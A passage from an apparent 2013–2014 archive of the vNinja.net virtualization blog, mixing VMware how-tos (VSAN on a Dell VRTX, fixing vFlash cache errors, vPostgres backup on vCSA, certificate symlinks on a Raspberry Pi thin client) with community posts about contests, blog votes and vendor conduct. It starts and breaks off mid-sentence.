Center, in a box. Or two boxes, for redundancy of course, or given VMware’s normal reliance on N+1, it’s probably best if you buy three of them to begin with. Why should I want to make anything up? Life's bad enough as it is without wanting to invent anymore of it. - Marvin, the Paranoid Android --- # What is VMware's Mystic Marvin Project? URL: https://vNinja.net/vmware-2/vmwares-mystic-marvin-project/ Date: 2014-06-08 Author: christian Tags: Hyperconverged, Marvin, Speculation, VMware Yesterday Fletcher Cocquyt posted a rather interesting photo on his Twitter account: This is, as far as I know, the first public sighting confirming the existence of the “mystic” project Marvin that VMware is working on. The text reads “Introducing the worlds first 100% VMware powered hyper converged infrastructure appliance.” I guess some of the VMware engineers forgot that the VMware campus get external visitors from time to time… So what is it? Well, there aren’t many details available but Marvin is indeed a registered trademark, by VMware. According to the trademark registration, it’s purpose is pretty clear: Computer hardware for virtualization; computer hardware enabling users to manage virtual computing resources that include networking and data storage. It has previously been speculated that VMware was building a hyper converged solution with EMC, but I doubt that EMC is the only OEM player here. VMware has a history of working with several vendors, and not just the mothership. I guess we’ll have to wait until VMworld US to get the full stack shimmies, but I don’t think there is any doubt that this will be based on vSphere and VSAN and perhaps even a scaled down version of NSX. I like the idea of “roll your own hyper converged stack”, based on an appliance model. After all, and I’m paraphrasing Joe Baguley here: Is your solution really software defined, if it requires specific bits of tin to work? Bring on VMworld, I really want to meet Marvin, but lets hope he’s a bit more upbeat than the original from Hitchhikers Guide to the Galaxy: Marvin is a severely depressed robot. He's regularly so depressed that, when he gets bored and talks to other computers, they commit suicide and die. I guess we all should bring our own towels to this one. For more speculation have a look at http://vninja.net/vmware-2/marvin-speculation/ --- # And the Chromecast Winner is ... URL: https://vNinja.net/virtualization/chromecast-winner/ Date: 2014-05-08 Author: christian Tags: Chromecast, contest, fun, Ninja, Photo, Winner A little over a month ago I announced the Want to Win a Google Chromecast contest and finally the winner has been selected. Since there was a grand total of 5 submissions, and one of them was immediately disqualified for a distinct lack of Ninja-presence, I decided to just do a random draw. The submitted photos were numbered by the order they appeared in on my post as I took this screenshot. I then put the number range 1 to 4 into random.org and recorded the output By random selection, the winning submission is Ninja with Entourage submitted by Chad Singleton. Chad Singleton Congratulations! Please contact me for shipping details, and I’ll get the Chromecast sponsored by Veeam shipped in your direction as soon as possible! --- # VMware vShield Manager Upgrade - Password Issues URL: https://vNinja.net/vmware-2/vmware-vshield-manager-upgrade-password-issues/ Date: 2014-04-29 Author: christian Tags: Appliance, Internationalization, Password, VMware, vShield, vShield Manager While upgrading a vShield Manager 5.1.1 install to 5.1.4 at a client, I ran into an issue with logging in after a completed upgrade. The username and password used to log in, and subsequently upload the upgrade file, was no longer working after the upgrade finished and the vShield Manager appliance had been rebooted. It turns out that this was due to using international characters in the password for the admin user, in this case the Norwegian specialities æ, ø or å. I was “lucky” enough to have taken a snapshot of the 5.1.1 vShield Manager appliance before performing the upgrade. After reverting back to the pre-upgrade snapshot, logging in, changing the password to one not containing international characters, and then performing the upgrade procedure again the appliance was upgraded to 5.1.4 and logon could be done with out problems. Be careful when using international characters in passwords for any of the VMware appliances, as I suspect this might be an issue also for other components, not only the vShield Manager. --- # Want to Win a Google Chromecast? URL: https://vNinja.net/news/win-google-chromecast/ Date: 2014-04-02 Author: christian Tags: Contest. Photo, fun, Ninja I have a free Google Chromecast to give a way to one lucky winner. As part of being voted into the top 50 VMware & virtualization blogs I was lucky enough to win one for myself, and as an added bonus I get to give away one to one of my readers too! To be able to find a worthy winner of it, I’ve decided to host a contest. Since I do enjoy a bit of photography, and the site name is vNinja, the contest rules is as follows: Send in a photo of yourself, your wife, kids, grandma, cat or dog, dressed as a ninja. That’s right, dress up someone as a ninja, snap a photo and send it my way either via Twitter or as a comment on this post, and I’ll pick the best one. Note that the ninja has to be visible. Any photo received with no visible ninja’s in it, will be disqualified, even though stealth is the way of the ninja. The winner gets the Chromecast. Entries sent in before April 30th will be judged, so get to it! If you need tips on how to dress up, have a look at this: --- # 2014 Top vBlog Results URL: https://vNinja.net/virtualization/2014-top-vblog-results/ Date: 2014-03-27 Author: christian Tags: Awesome, contest, fun, Vote Eric Siebert has yet again pulled through, and organized his annual top VMware & virtualization blogs vote, and the results are now in. Congratulations to everyone involved, be it bloggers, podcasters or otherwise engaged in making this possible. This year, Eric hosted a live Google Hangout session with John M. Troyer, David M. Davis and Rick Vanover where the top lists were revealed, be sure to check it out: As far as results go, I’m very happy that you guys voted vNinja in at #43, of a total of 320, up a whopping 30 places since last year. This is the first year that vNinja breaks into the top 50, something that is very much appreciated. vNinja was also listed in the independent category, where it was placed at a very, very, respectable 18th place! What is even more fun though, is that vSoup was voted the 2nd best Virtualization Podcast, only beaten by those pesky vBrownbag guys. As an added bonus, I even won a Google Chromecast for voting, and whats even better is that I get to give away one to one of vNinja’s readers as well! So, if you want a free Google Chromecast, shipped directly your way, you have to send in a photo of yourself, your wife, kids, grandma, cat or dog, dressed as a ninja. That’s right, dress up someone as a ninja, snap a photo and send it my way either via Twitter or as a comment on this post, and I’ll pick the best one. The winner gets the Chromecast. Entries sent in before April 30th will be judged, so get to it! --- # VSAN - The Unspoken Future URL: https://vNinja.net/virtualization/vsan-unspoken-future/ Date: 2014-03-17 Author: christian Tags: Data Center, featured, Form Factor, Node, SDDC, Server, Virtualization, VSAN This rather tongue-in-cheek title, is a play on Maish recent VSAN - The Unspoken Truth post where he highlights what he thinks is one of the hidden “problems” with the current version of VSAN is it’s inherent non-blade compatibility and current lack of “rack based VSAN ready nodes”. Of course, this is a reality; If you base your current infrastructure on blade servers, VSAN probably isn’t a good match as it stands today. Chances are that if you are currently running a blade-based datacenter, you have traditional external storage on the back end of that, and that you for quite some time will be running a form factor that VSAN simply isn’t designed for. I don’t disagree with Maish in that conclusion, not a bit. But what about the next server refresh? One of the things that VSAN is a facilitator for, along with enhancements in the storage industry, is the ability to move to other form factors. Currently Supermicro offers their rather nice looking FatTwin™ Server Solution. If we look at what the SYS-F617R2-R72+ box offers, in the total rack space of 4U (less than most blade chassis), it is clear that the form factor choices will not just be tower or blade, the will also include other new form factors that are currently not in the forefront of peoples minds when designing their data center. Looking at the Supermicro box again, in a 4U rack footprint, it offers these maximums pr node: 2 x Intel® Xeon® processor E5-2600 Up to 1TB DDR3 ECC LRDIMM 6x Hot-swap 2.5" SAS2/SATA HDD trays So, in 4U, you can get 16 CPU, 8TB RAM and 48 SAS2/SATA bays. Stick a couple of those in your rack, with a few 10GbE ports, and then try to do something similar with a blade infrastructure! Now, of course, VSAN isn’t for everyone, nor is it designed to be. In a way VSAN offers a peak to the future of datacenter design, in the same way that it shows us that Software Designed Data Center (SDDC) is not just about the software, it’s about how we think, manage AND design our back-end infrastructure. It’s not just storage vendors that need to take heed and look at what they are offering, the same also goes for “traditional” server/node vendors. That’s right, a server is becoming a node and which vendors sticker is in the front, might not matter that much in the future. The future is already here – it's just not evenly distributed. — William Gibson --- # It's All Fun and Games Until... URL: https://vNinja.net/vmware-2/fun-games-until/ Date: 2014-03-10 Author: christian Tags: Certification, Snark, VCP, VMware Remember, it’s all fun and games until someone loses a certification --- # VMware Certified Professional Recertification URL: https://vNinja.net/vmware-2/vmware-certified-professional-recertification/ Date: 2014-03-08 Author: christian Tags: Certification, VCAP, VCP, VMware, vSphere VMware has announced a Recertification Policy for it’s VMware Certified Professional program, effective as of March 10, 2014. In short, it means that you are no longer a VCP(x) for life, but need to recertify every 2 years, unless you take a VCAP exam during the same period. If you do not upgrade your certification, your VCP status is revoked. For all the details, have a look at Recertification Policy: VMware Certified Professional. It also means that anyone currently holding a VCP certification, needs to recertify before March 10th 2015, regardless of when the initial VCP was obtained. Those obtaining a VCP after March 10th, will have to recertify within two years of obtaining the initial VCP. I think this is a good move, and is on par with other technical certifications like ones offered by HP, Cisco and CompTia (A+). After all, we live in an ever evolving technical market where continuous change happens and if you are not able to keep current, the certification holds no real merit. This change from VMware also means that as long as you recertify your VCP exam within the two year period, there will not be a course requirement to upgrade; schedule your exam and you are ready to go. Previously you would get a grace period, after a new major release of vSphere, where you could re-certify without having to attend a new class. With this change, you have two years, and that is it. In a way, this also means that VMware will have to commit to major releases, with upgraded VCP versions, more frequently than every 2 years. Looking at the last two vSphere releases, this seems to indicate a change in release cycles for major versions: vSphere 4 was released May 21st 2009. vSphere 5 was released July 12th 2011 vSphere 5.5 was released September 22nd 2013. Remember, vSphere 5.5 is covered by the VCP5 (ok, there is a VCP510 and VCP550 version) certification, so if this policy was in place in 2011 when vSphere 5 was released, there would not be any upgraded VCP certification to take within the two year validity period. Update:What if VMware had called an old VCP certification “retired” instead of “expired”, would that cause less outrage and emotion? --- # Rock the Vote 2014 URL: https://vNinja.net/virtualization/rock-vote-2014/ Date: 2014-02-22 Author: christian Tags: Annual, Community, fun, VMware, Voting Once again, it’s time to vote for the top VMware & virtualization blogs. As usual Eric Siebert has opened up the floodgates and set up a voting system, and once again managed to create a lot of work for himself. So, let’s all make it worth his while and get as many votes in as possible! There are a lot of blogs listed, this time there are over 300 in total. Cast your vote, and get more information about the process: Voting now open for the 2014 top VMware & virtualization blogs # Helpful hint: vNinja.net is listed in the general section, as well as under independent bloggers, and vSoup is listed under Podcasts. Now go do your part. --- # Configuring VSAN on a Dell PowerEdge VRTX URL: https://vNinja.net/virtualization/configuring-vsan-dell-poweredge-vrtx/ Date: 2014-02-19 Author: christian Tags: Dell, ESXi, Hardware, storage, VMware, VRTX, VSAN The Dell PowerEdge VRTX shared infrastructure platform is interesting, and I’ve been lucky enough to be able to borrow one from Dell for testing purposes. One of the things I wanted to test, was if it was possible to run VMware VSAN on it, even if the Shared PERC8 RAID controller it comes with is not on the VMware VSAN HCL, nor does it provide a method to do passthrough to present raw disks directly to the hosts. My test setup consists of: 1 Dell PowerEdge VRTX SPERC 8 7 x 300GB 15k SAS drives 2 x Dell PowerEdge M520 blades 2 x 6 core Intel Xeon E5-2420 @ 1.90Ghz CPU 32 GB RAM 2 x 146GB 15 SAS drives Both M520 blades were installed with with ESXi 5.5, which is not a supported configuration from Dell. Dell has only certified ESXi 5.1 for use on the VRTX, but 5.5 seems to work just fine, with one caveat: **Drivers for the SPERC8 controller is not included in the Dell customized image for ESXi 5.5. To get access to the volumes presented by the controller, the 6.801.52.00 megaraid-sas driver needs to be installed after ESXi 5.5. ** Once that is installed, the volumes will appear as storage devices on the host. Sadly the SPERC8 controller does not support passthrough for disksin the PowerEdge VRTX chassis, something VSAN wants (For details check VSAN and Storage Controllers). For testing purposes though, there is a way around it. By creating several RAID0 Virtual Volumes on the controller, each one with only one disk in it, and assigning these disks to dedicated hosts in the chassis it is possible to present the disks to ESXi in a manner that VSAN can work with: A total of six RAID0 volumes have been created, three for each host. Each host gets granted exclusive access to three disks, resulting in them being presented as storage devices in vCenter Since I don’t have any SSD drives in the chassis, something that is a requirement of VSAN, I also had to fool ESXi into believing one of the drives was in fact SSD. This is done by changing the claim rule for the given device. Find the device ID in the vSphere Client, and run the following commands to mark it as an SSD: (Check KB2013188 Enabling the SSD option on SSD based disks/LUNs that are not detected as SSD by default for details.) ~ # esxcli storage nmp satp rule add --satp VMW_SATP_LOCAL --device naa.6b8ca3a0edc7a9001a961838899ee72a --option=enable_ssd ~ # esxcli storage core claiming reclaim -d naa.6b8ca3a0edc7a9001a961838899ee72a Once that part is taken care of, the rest of the setup is done by following the VSAN setup guides found in the beta community. Two Dell PowerEdge M520 nodes up and running, with VSAN, replicating between them inside a Dell PowerEdge VRTX chassis. Pretty nifty! It is worth noting is that in this setup, the SPERC8 is a single point of failure, as it provides disk access to all of the nodes in the same cluster. This is not something you want to have in a production environment, but Dell does offer a second SPERC8 option for redundancy purposes in the PowerEdge VRTX. I did not do any performance testing on this setup, mostly since I don’t have SSD’s available for it, nor does it make much sense to do that kind of testing on a total of 6 HDD spindles; This is more a proof of concept setup than a production environment. --- # Automatically Name Datastores in vSphere? URL: https://vNinja.net/vmware-2/automatically-datastores-vsphere/ Date: 2014-02-18 Author: christian Tags: Datastore, ESXi, Ideas, Policy Based Computing, storage, vCenter, Virtualization, VMware, VSAN, vSphere William Lam posted “Why you should rename the default VSAN Datastore name” where he outlines why the default name for VSAN data stores should be changed. Of course, I completely agree with his views on this; Leaving it at the default might cause confusion down the line. At the end of the post, William asks the following: I wonder if it would be a useful to have a feature in VSAN to automatically append the vSphere Cluster name to the default VSAN Datastore name? What do you think? The answer to that is quite simple too; Yes. It would be great to be able to append the cluster name automatically. But this got me thinking, wouldn’t it be even better would be to use the same kind of naming pattern scheme we get when provisioning Horizon View desktops, when we provision datastores? In fact, this should also be an option for other datastores, not just when using VSAN. Imagine the possibilities if you could define datastore naming schemes in your vCenter, and add a few variables like this, for instance: {datastoretype}-{datacentername}-{clustername/hostname}-{fixed:03}. Then you could get automatic, and perhaps even sensible, datastore naming like this: local-hqdc-esxi001-001 iscsi-hqdc-cluster01-001 nfs-hqdc-cluster01-001 fc-hqdc-cluster01-001 vsan-hqdc-cluster01-001 And so on… I’m sure there are other potentially even more useful variables that could be used here, perhaps even incorporating something about tiering and SLA´s (platinum/gold/silver etc.) but that would require that you knew the storage characteristics and how it maps to your naming scheme when it gets defined. But yes, we do need to be able to automatically name our datastores in a coherent matter, regardless of storage type. After all, we’re moving to a model of policy based computing, shouldn’t naming of objects like datastores, also be ruled by policy, defined at a Datacenter level in vCenter (wait a minute, why don’t do the same for hosts joined to a datacenter or cluster?) --- # Random VCDX Tips and Quotes? URL: https://vNinja.net/virtualization/random-vcdx-tips-quotes/ Date: 2014-01-29 Author: christian Tags: Desktop, featured, fun, GeekTool, PHP, Quotes, Script, VCDX I needed something to spruce up my desktop environment, and it seems that one of the more popular ways to do that is to display random quotes and such on your desktop. Instead of hooking up to an existing quotes database, I simply made my own. I have collected a few VCDX related tips and quotes, primarily from the archive Duncan Epping put together of VCDX Tips from VCDX 001 John Arrasjid, but also from the “submissions” I got from VCDX? Give Me a Quote! If anyone else wants their quote/tip/hint added to the database, please let me know! But gathering all of these in a single location has no real purpose, so I managed to code up a really small PHP script that picks a random quote, and return it with attribution. The output is available at http://vninja.net/labs/quotes/quote.php and should return a random line from the db on each query. I use this in combination with GeekTool to display a random, changing, quote right on my desktop: Inside GeekTool, I run the following command to generate the output: curl http://vninja.net/labs/quotes/quote.php This is set to refresh every 120 seconds, as long as I have internet connectivity. Feel free to use the script to do something similar, or if you have a better idea for it’s usage let me know! --- # VCDX? Give me a Quote! URL: https://vNinja.net/news/vcdx-give-quote/ Date: 2014-01-24 Author: christian Tags: fun, Quotes, VCDX For a tiny project, I need some help from anyone who has completed (successfully or not) the VCDX process. _All I’m asking is that you provide me with a single line quote about the VCDX process, or the VCDX program itself. _ Please send any quotes to me on Twitter, either as a mention or as a DM, your choice. Once I have a handful of quotes available, they will be made public for others to use as well… A bit vague, I know, but more details will come later. --- # Fixing "Could not create vFlash cache" error when powering on a VM URL: https://vNinja.net/virtualization/fixing-could-create-vflash-cache-error-powering-vm/ Date: 2014-01-19 Author: christian Tags: featured, SSD, vCenter, vCenter Appliance, VCSA, vFlash Read Cache, vFRC, vSphere, Web Client During some way overdue housekeeping in my HP Microserver-based “Homelab” today, I ran into a rather annoying issue that prevented me from starting one of my more important VMs; namely my home Domain Controller. In short, I removed an old SSD drive that I’ve used for vFlash Read Cache (vFRC) testing and installed a new 1TB drive instead. Since I have a rather beefy work lab now, I need space more than speed at home, so this seemed like a good idea at the time. A good idea that is, until I tried starting my DC VM, which also is my DNS and DHCP server, and got greeted with this little gem: The “Could not create vFlash cache: msg.vflashcache.error.VFC_FAILURE” error is understandable, the SSD drive was removed, but I honestly did not think that even if a VM was configured to use it, that it’s absence would prevent a power-on operation on that VM. I would have expected it to throw a warning about the cache location missing, and warn me that acceleration was not happening, not a flat out “cannot power on”. Normally the fix for this would be quick and easy, edit the VM and remove the vFRC configuration, but since my host has a whopping total of 8GB of memory I don’t have vCenter running at all times. Editing the VM settings through the vCenter Legacy Client (C#) does not work, since vFRC requires Virtual Hardware Version 10, which it cannot edit. Once I got the vCenter Server Appliance (vCSA) fired up, I realised that I have somehow forgotten the admin AND root passwords, and was completely unable to log-on. How that has happened is beyond me, but for the life of me I was not able to log on. Next step was to try and edit the VM from VMware Workstation 10 installed on one of the Windows boxes in my network. Sadly Workstation has no concept of vFRC, and it is not possible to edit that particular VM setting, even if you connect it to the vSphere host. I later on also realized that VMware Workstation 10 is also unable to host connect USB peripherals, like printers, to a VM, but that’s beside the point right now. So, either trying to hack the VM Hardware Version to a value that the vSphere Client can handle, of deploying a new vCSA instance, I was left with editing the VMs vmx file directly. Thankfully this was an easy way to fix the problem, and get the VM powered on. For each vmdk file that is configured to use vFRC, there is a corresponding entry in the vmx file, that controls vFRC. In order to turn off vFRC acceleration for a given disk, download the vmx file, and change the value for .vFlash.enabled from sched.scsi0:2.vFlash.enabled = "TRUE" to sched.scsi0:2.vFlash.enabled = "FALSE" Re-upload the vmx file, and try to power on. In my case, this fixed the problem of powering on the VM. This problem again highlights one of the problems with the dependancy on the new vSphere Web Client. In a real production environment, the vCenter would be up and running at all times, and editing the VM would have been a small task, but what if you had used vFRC to speed up vCSA itself, and you had a failed SSD drive? Of course, in this case the fault is mostly mine. I removed a “production SSD”, without first removing the vFRC configuration. I did not have a working vCSA with Web Client up and running when this was done, and I had forgotten my passwords. A pretty specific error generating procedure if there ever was one. It’s an easy fix to edit the vmx file, but it does at times feel a little bit like you are now able to cut of the branch you are sitting on with the new vSphere Web Client. In simpler days, you could pretty much fix anything by connecting the vSphere Client to the host and fix any errors there, but now the dependancy on the vCenter Server is stronger than ever. Before upgrading your VMs to Hardware Version 10, make sure you understand the implications of going all-in with dependancies on the Web Client and vCenter. It might just come back and bite you if you haven’t thought through your design. --- # Importing SSL Certificates to Raspberry Pi Thin Client URL: https://vNinja.net/virtualization/importing-ssl-certificates-raspberry-pi-thin-client/ Date: 2013-12-05 Author: christian Tags: Certificates, Citrix, Raspberry Pi, Receiver, SSL, Thin Client When playing around with the Raspberry Pi Thin Client, I ran into an issue with the SSL certificates for the Citrix Receiver client. For some reason it didn’t want to play with the certificates installed on the server side, and popped the following error message: **You have not chosen to trust "AddTrust External CA Root", the issuer of the server's security certificate.** Thankfully there is a quick fix for this! Since Iceweasel is also in the RPTC distribution, and it has a lot more SSL root CA certificates included by default, all that was required (in my case) was to link the certificates it has with the certificates the Citrix Receiver client can use. Issue the following command to create symlinks for the “missing” certificates in the Citrix Receiver keystore: sudo ln -s /usr/share/ca-certificates/mozilla/* /opt/Citrix/ICAClient/keystore/cacerts/ supply in the root password, which in RPTC is raspberry by default, and if your CA’s root certificate is included with Iceweasel, you should now be able to connect without getting certificate errors. It’s pretty neat to be able to use small Raspberry Pi as a Thin Client like this, but it’s too bad that it does not support VMware Horizon View using PCoIP (yet?), only RDP, something I have yet to test since my demo environment runs PCoIP only at the moment. Thanks again to Simplivity for their Raspberry Pi vEXPERT gift! --- # Nordic VMUG Conference - My Thoughts URL: https://vNinja.net/vmware-2/nordic-vmug-conference-thoughts/ Date: 2013-12-04 Author: christian Tags: event, Nordic VMUG, Social, VMUG, VMware On Tuesday, December 3, 2013 VMware User Group Denmark arranged the Nordic VMUG Conference. The event itself can only be described as a mini-VMworld, with over 600 registered attendees, and a speaker list worthy of such a nick-name. The opening keynote was held by Joe Baguley, the closing keynote was held by Chad Sakac. In between those two, you had the possibility to attend sessions held by Cormac Hogan, Mike Laverick, Frank Brix, Paudie O-Riordan, Frank Denneman, Mattias Sundling, David Davis and Duncan Epping. There was even a mini solutions exchange where vendors scanned your badges, tried to sell you products and concepts or just update your geeky t-shirt wardrobe. Got that VMworld feeling yet? Both Joe and Chads keynotes were eye-openers. It is really refreshing when people of “executive stature” like those two, actually skip the marketing slides and just talk. And man, both those guys talk good. "Think more like a chicken farmer, and less like a cat owner." ― Joe Baguley "A software defined thing that requires special hardware is not a software defined thing." ― Joe Baguley In particular Chad´s closing “The Nature and Impact of Disruption - On Industries, Vendors, and Customers” was really interesting as it was completely non-technical. The concept that disruption is not inherently good or bad, and that all change stems from a single individual is really intriguing. I think more people should ask themselves this; **How can I, or how do I, disrupt myself? ** "Disruption is characterized by change and fear." ― Chad Sakac Most of the people who are a part of the VMware community has actually done this already, consciously or not. Think about that for second… As usual at events, I spent most my time networking and talking to people, and I even got the chance to meet a few people I had yet to meet. Liselotte Foverskov and Jane Rimmer immediately springs to mind, but I also got to have a chat with Magnus Andersson and Rasmus Haslund actually drove me and my wife to the beer tasting event held at Mikkeler after the conference. I have to say that I am very impressed by what the Danish VMUG leadership has been able to pull off here, it is no small task arranging an event of this magnitude, especially when you do it on your spare time. I am honoured to have been invited as a guest, and it serves as a real inspiration now that we are really trying to get the Norwegian VMUG active with our first meeting in Bergen in March 2014. Hopefully things are in motion, and we will have meetings in Oslo and in Trondheim as well. There is absolutely no way we are aiming as high as VMUGDK, at least not initially, but one thing is certain; If you don’t know where you are going, any road will get you there. --- # Sometimes You Simply Get What You Pay For URL: https://vNinja.net/virtualization/simply-pay/ Date: 2013-12-01 Author: christian Tags: Charity, Movember, Podcasting for Cancer Some time during the Podcasting for Cancer fundraiser period I somehow suggested that we should pair it with this years Movember. Despite my wife and daughters strenuous protests, I signed up and went all in. By all in, I mean, all in. For the first time since I went to my then employers christmas party dressed as a woman, I shaved my whole face. My trusty goatee, who had been pretty much constantly with me since 1997, was gone. I looked like I was 12 years old. And to be honest, it went pretty much downhill from there. I would like to thank Matthew Northam, Arjan Timmerman, Duncan Epping, Eric Sloof, Marco Broeken and Julian Wood for their Movember donations in my name. Sorry guys, but this is what you actually paid for. It´s not pretty, but it is what it is. Remember, you have been warned. I guess that if this IT and virtualization thing doesn’t work out, I can always audition for a part in Sons of Anarchy… --- # VMware VCAP-DCD Boot Camp URL: https://vNinja.net/virtualization/vmware-vcap-dcd-boot-camp/ Date: 2013-11-27 Author: christian Tags: Boot Camp, Certification, VCAP, VCAP-DCD, VMware A while before VMworld Europe 2013 in Barcelona, I was lucky enough to be asked by John Arrasjid if I wanted to help out reviewing the new VCAP-DCD boot camp VMware Education has been working on. So far the VCAP Design Boot Camp has been tested in Spain, Singapore, and Malaysia, with over 300 participants so far. In addition to this, a two part vBrownbag series covering the boot camp content was recorded and released: VCAP Design Bootcamp with John Arrasjid, Mostafa Khalil and Linus Bourque VCAP Design Bootcamp Part 2 with John Arrasjid, Linus Bourque and Jon Hall If you are considering doing the VCAP-DCD certification, or even just curious about this advanced certification content and process, this is a must watch. If you get the chance to physically attend one of the boot camps, do it! I was able to join one of the first ones held, in Barcelona, and I must say it´s a bit of an eye-opener when it comes to understanding how the VCAP-DCD exam designed and scored. --- # Can Microsoft really be Fair and Balanced? URL: https://vNinja.net/virtualization/microsoft-fair-balanced/ Date: 2013-10-29 Author: christian Tags: Free, Hyper-V, Microsoft, SCVMM, System Center, Training, VCP, VMware Microsoft has launched Virtualization2, a program to educate VMware administrators on Hyper-V and the System Center suite of tools. In short, these arefree online training sessiosn on November 19th and 20th, that also comes with a voucher for their new Microsoft virtualization certification exam (74-409). This comes in addition to their existing Microsoft Virtualization for VMware Professionals Jump Start training course. I think this is a good idea, and if you are able to close your eyes to the hyperbole, and disregard things like “Microsoft Wants to Help VMware Experts “Future-Proof “ Their Career”, I applaud this initiative. However, if the training content is based on Microsofts own (flawed) vSphere vs Hyper-V & System Center comparisons (see Calling Out the Phony War: vSphere & Hyper-V for a detailed analysis), the training offered has little to no value. Vendor training is, and always will be, like Ed Grigson mentioned on Twitter, inherently biased by nature. @h0bbel ...assuming that vendor training always has a bias (including VMware) — Ed Grigson (@egrigson) October 29, 2013 In this case, the level of both hyperbole and bias is what defines the quality of the content presented. If Microsoft manages to focus on their own product, seen from the perspective of someone who has experience with VMware vSphere, without resorting to over-the-top bias towards Hyper-V, this will be a valuable resource for lots of people, myself included. If not, well, it will just be added to the list of flawed marketing tactics that really is of little to help anyone, Microsoft included. --- # Brace Yourselves: Top vBlog 2014 edition is coming URL: https://vNinja.net/virtualization/brace-yourselves-top-vblog-2014-edition-coming/ Date: 2013-10-28 Author: christian Tags: 2014, Blog, Vote Eric Siebert has just announced the preliminary details for next years Top vBlog vote. This time around it is sponsored by Veeam, and there are even prizes to be won, not only the notorious fame and fortune that comes with being voted in the top percentile. Thanks again to Eric for putting all of this together, there is a lot of work involved and the community really values the effort. Note to self: Remember to actually nominate yourself this year, it might actually make a difference. --- # Check for OS X Updates Automatically URL: https://vNinja.net/osx/check-os-updates-automatically/ Date: 2013-10-22 Author: christian Tags: Apple, automation, Impatient, Mac, OS X Yeah, I admit it. I want OS X Mavericks, and I want it now. Unfortunately, it´s not available yet from Software Update. So instead of manually checking every 5 minutes or so, I decided to create a small bash script that does it for me. It´s very, very simple, but I think it does the job: First off, pop into Terminal and get root access: h0bbel::h0bair { ~ }-> sudo su - Then create a small bash script, I named mine update.sh, that contains the following: while true do softwareupdate -l sleep 60 done Change it to be executable by running chmod +x update.sh Then run the script, to have softwareupdate run over and over again (60 seconds after it completes) until you break it with ctrl-c h0bair:~ root# ./update.sh Software Update Tool Copyright 2002-2010 Apple No new software available. At least I now get warning once it´s available. I can has Mavericks nao? --- # VMworld Europe 2013 - Here I Come URL: https://vNinja.net/virtualization/vmworld-europe-2013/ Date: 2013-10-09 Author: christian Tags: Barcelona, Tech Conference, VMware, vmworld For the first time since 2010 I will actually be physically attending VMworld Europe! I fly over from the very cold, rainy and generally very autumny Norway to sunny Barcelona on Sunday the 13th. Based on my past experience from VMworld in Copenhagen, I have decided to go easy on the session scheduling and not fill my calendar to the brim. Sure, the sessions provide insane amounts of useful content, but for me the main reason to attend VMworld is to physically meet up and talk to a lot of the people I usually spend a lot of time communicating with. The social aspect, also called the hallway track, is to me the most valuable aspect of attending. After all, the sessions are recorded and available post-conference anyway. So, expect to find me in the hangspace and community lounge for the most part. Odds are you might find me at a party or two as well… If you see me, please stop and say hi! I will also be a part of the vBrownbag TechTalks when we do a APAC Virtualization Podcast / vSoup crossover live recording. I’m really looking forward to that, should be some good fun! Oh, and I´ll be a part of the vExpert Daily slot on Wednesday the 16th. I might also be doing a vBrownbag TechTalk of my own as well, but the jury is still out on that one… --- # Social Media, Karma and Being a Dick URL: https://vNinja.net/rant/social-media-karma-dick/ Date: 2013-10-08 Author: christian Tags: Acronis, EMC, featured, Microsoft, Rant, Social Media, vmworld Rant alert # [@Acronis](https://twitter.com/Acronis) sorry, not happening. — Christian Mohn (@h0bbel) October 8, 2013 In and of itself, this tweet is fair enough, even if borderline spam. My reaction to it however, tells a different story. _I admit it, it´s a bit harsh and straight to the point, but something has to have triggered such a response, right? _Rewind back to VMworld US, and Acronis posted this: [@sbeloussov](https://twitter.com/sbeloussov) [@veeam](https://twitter.com/veeam) [@VMworld](https://twitter.com/VMworld) fortunately we don't need to make our customers drunk to persuade them to buy our soft.. — acronis (@Acronis) August 27, 2013 Here is another example (added post initial publish, thanks to Hans for his comment) Want to be smart or stupid? Veeam party is vodka party. Acronis is Blue Cheese-Red Wine party. Be smart and get to know backup at [#VMworld](https://twitter.com/search?q=%23VMworld&src=hash)! — acronis (@Acronis) September 30, 2013 This just rubs me the wrong way. Not only does it imply something about a competitor, but it implies a lot about their customers as well. Tongue in cheek? Sure, but at the same time outright rude and alienating. For all I know, Acronis might just provide the greatest backup solution seen in the known universe, but their style of communication alienates me as a potential customer. I chose to call out Acronis this time, but it could just have easily have been EMC #NotAppy, or even Microsoft´s Custard “stunt” at VMworld US 2013, or just about any company that employs booth babes in any way, shape or form. These things are, at least to me, just plain stupid. While they might have been seen as a good idea in that late night marketing mind-map session, but they just don’t hold up when daylight appears and it is exposed to the real world. We all know that people we meet, online or otherwise, check who we are and what we do. We live in a digital age where it’s easy to find information. Employers check their candidates, and I sure hope potential employees check their potential employers. Two way traffic, as it should be! Please remember this, its not only individuals who should be careful, companies should too. Treat everyone with respect, and magically others might just treat you the same way. Perhaps that would generate just as much attention as these attempts to be funny, which for that most part simply fall flat to the ground any way. My opinion of you is formed by your demeanor. Please act accordingly. In essence; Don’t be a dick. We all know tech conferences are filled with those already. Oh and yeah, about that Karma thing: ![](http://d202m5krfqbpi5.cloudfront.net/authors/1292575376p2/33041.jpg) If you're really a mean person you're going to come back as a fly and eat poop.” ― [Kurt Cobain](http://www.goodreads.com/author/show/33041.Kurt_Cobain) So there. Header photo (c) Alan Turkus “Your karma is leaking” --- # vPostgres Database Backup in vCSA 5.5 URL: https://vNinja.net/virtualization/vpostgres-database-backup-vcsa-5-5/ Date: 2013-10-01 Author: christian Tags: Appliance, Backup, VCSA, VMware, vPostgres, vSphere With the new vSphere 5.5 release, the VMware vCenter Appliance (vCSA) has grown up to be a viable alternative to the traditional Microsoft Windows based vCenter deployment scenario. The new vCSA version supports up to 100 hosts and 3000 (with an external Oracle database the values change to 1000/10000) virtual machines, a big improvement from 5 hosts and 50 virtual machines in the previous version. Sadly, the only external database option available for vCSA 5.5 is Oracle, which means there is still no external Microsoft SQL Server support. For those clients who don´t have an existing Oracle infrastructure, this might be a problem especially with regards to backup of the vCSA database. The internal database in vCSA is a modified version of Postgres, that VMware has called vPostgres. Thankfully this also includes the native Postgres command to create database dumps, pg_dump. In order to create a database dump of the vPostgres database, the following command needs to be run by opening a SSH connection to the vCSA: ~ # /opt/vmware/vpostgres/1.0/bin/pg_dump EMB_DB_INSTANCE -U EMB_DB_USER -Fp -c > VCDBBackupFile EMB_DB_INSTANCE and EMB_DB_USER are to be replaced with values from the /etc/vmware-vpx/embedded_db.cfg file In my case, the exact command would be: ~ # /opt/vmware/vpostgres/1.0/bin/pg_dump VCDB -U vc -Fp -c > /tmp/VCDBBackupFile Note that EMB_DB_INSTANCE is replaced with VCDB and EMB_DB_USER is replaced by vc in the command above. Both values come from /etc/vmware-vpx/embedded_db.cfg Off it goes, and 